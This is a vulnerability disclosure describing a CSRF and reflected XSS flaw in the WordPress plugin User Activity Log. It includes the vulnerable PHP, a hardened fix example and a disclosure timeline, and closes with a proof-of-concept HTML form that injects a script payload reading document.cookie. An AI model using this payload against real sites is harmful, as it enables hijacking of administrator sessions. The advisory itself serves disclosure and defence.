Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in User Activity Log
Every additional plugin that you add to your WordPress website adds additional security risk, and that includes security plugins. Recently we did a quick check of plugins designed to let you keep track of actions taken by users on your website. In several cases we found rather minor security vulnerabilities. Like the first issue we found in the plugin User Activity Log, this one involves a lack of protection against cross-site request forgery (CSRF).
This vulnerability involves a lack of protection against CSRF when saving the plugin’s settings, due to the absence of a nonce check.
This can be combined with cross-site scripting (XSS) on the Email settings page. While the values are all eventually validated or sanitized, the POST inputs “sol-mail-to” and “sol-mail-from” are stored in the variables $to_email and $from_email respectively before they are validated, on lines 460-481 of the file /user_settings_menu.php:
    $to_email = $_POST['sol-mail-to'];
    $from_email = $_POST['sol-mail-from'];
    $mail_msg = ual_test_input($_POST['sol-mail-msg']);
    $emailEnable = $_POST['emailEnable'];
    update_option('enable_email', $emailEnable);
    if (isset($_POST['emailEnable'])) {
        if ($_POST['emailEnable'] == '1') {
            if ($mail_msg == "") {
                $msg = __("Please enter message", 'wp_user_log');
            }
            if ($to_email == "" || $from_email == "") {
                $msg = __("Please enter the email address", 'wp_user_log');
            }
            if (!filter_var($to_email, FILTER_VALIDATE_EMAIL) || !filter_var($from_email, FILTER_VALIDATE_EMAIL) || !is_email($to_email) || !is_email($from_email)) {
                $msg = __("Please enter valid email address", 'wp_user_log');
            } else {
                update_option('to_email', $to_email);
                update_option('from_email', $from_email);
                update_option('email_message', $mail_msg);
            }
        }
    }
Placing malicious JavaScript code in those inputs will cause the values not to be saved permanently (they fail the email validation), but the unvalidated values are still echoed out on the page at line 530:
    <input name="sol-mail-from" type="email" value="<?php echo $from_email; ?>" />
and at line 537:
    <input name="sol-mail-to" type="email" value="<?php echo $to_email; ?>" />
Since the cross-site scripting (XSS) is reflected and not persistent, in major web browsers other than Firefox it would be hard to exploit this since you would need to get around the XSS filtering they include to protect against this type of exploit.
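The two defects have two well-known fixes in WordPress: a nonce check so that a cross-site form post is rejected before anything is saved, and escaping at the point of output so that a value containing quotes or angle brackets cannot break out of the attribute. The following is an added example of a hardened save handler and output, written for this advisory; it is not the plugin's code. The function names ual_hardened_save_email_settings() and ual_hardened_render_email_fields() and the nonce action/field names are assumed; the WordPress functions used (check_admin_referer, wp_nonce_field, current_user_can, sanitize_email, sanitize_text_field, wp_unslash, is_email, update_option, get_option, esc_attr) are real core APIs.

```php
<?php
// Added example, not the plugin's code. Hypothetical function and nonce names;
// the WordPress API calls are real.

function ual_hardened_save_email_settings() {
    // Only act on this form's own submit button.
    if ( ! isset( $_POST['btnsolEmail'] ) ) {
        return null;
    }

    // CSRF fix: a missing or invalid nonce ends the request (403) here,
    // so a form submitted from another site never reaches the code below.
    check_admin_referer( 'ual_save_email_settings', 'ual_email_nonce' );

    // Capability check: changing plugin settings is an administrator action.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'Insufficient permissions', 'wp_user_log' ) );
    }

    $enabled = ( isset( $_POST['emailEnable'] ) && '1' === $_POST['emailEnable'] ) ? '1' : '0';

    // Sanitize on input: sanitize_email() strips characters that cannot appear
    // in an address, so script tags never survive into the variables at all.
    $to_email   = isset( $_POST['sol-mail-to'] )   ? sanitize_email( wp_unslash( $_POST['sol-mail-to'] ) )   : '';
    $from_email = isset( $_POST['sol-mail-from'] ) ? sanitize_email( wp_unslash( $_POST['sol-mail-from'] ) ) : '';
    $mail_msg   = isset( $_POST['sol-mail-msg'] )  ? sanitize_text_field( wp_unslash( $_POST['sol-mail-msg'] ) ) : '';

    update_option( 'enable_email', $enabled );

    if ( '1' === $enabled ) {
        if ( '' === $mail_msg ) {
            return __( 'Please enter message', 'wp_user_log' );
        }
        if ( ! is_email( $to_email ) || ! is_email( $from_email ) ) {
            return __( 'Please enter valid email address', 'wp_user_log' );
        }
        update_option( 'to_email', $to_email );
        update_option( 'from_email', $from_email );
        update_option( 'email_message', $mail_msg );
    }
    return null; // no error message
}

function ual_hardened_render_email_fields() {
    // Render from the stored, validated values rather than from raw $_POST.
    $to_email   = get_option( 'to_email', '' );
    $from_email = get_option( 'from_email', '' );

    // Emits a hidden field carrying the nonce that check_admin_referer() verifies.
    wp_nonce_field( 'ual_save_email_settings', 'ual_email_nonce' );
    ?>
    <!-- XSS fix: esc_attr() encodes quotes and angle brackets, so a value such as
         "><script>... is rendered as text inside the attribute, never as markup.
         The same call is what makes it safe to redisplay user input on error. -->
    <input name="sol-mail-from" type="email" value="<?php echo esc_attr( $from_email ); ?>" />
    <input name="sol-mail-to" type="email" value="<?php echo esc_attr( $to_email ); ?>" />
    <?php
}
```

The order of operations matters: the nonce and capability checks run before any $_POST value is read or stored, sanitization happens on the way in, and escaping happens on the way out regardless of whether the value was sanitized, since the two protect against different failures.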
We received a response from the developer the same day we contacted them about this issue and the other one we discovered, but a month later the plugin has yet to receive an update, so the vulnerabilities still exist in the current version, 1.2.3.
Proof of Concept
The following proof of concept will cause any available cookies to be shown in an alert box when logged in to WordPress as an Administrator. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=email_settings_menu" method="POST">
<input type="hidden" name="emailEnable" value="1" />
<input type="hidden" name="sol-mail-from" value='"><script>alert(document.cookie);</script>' />
<input type="submit" name="btnsolEmail" value="Save Changes" />
</form>
</body>
</html>
Timeline
- 6/29/2016 – Developer notified.
- 6/29/2016 – Developer responds.
- 10/11/2016 – Version 1.2.6 released, which fixes issue.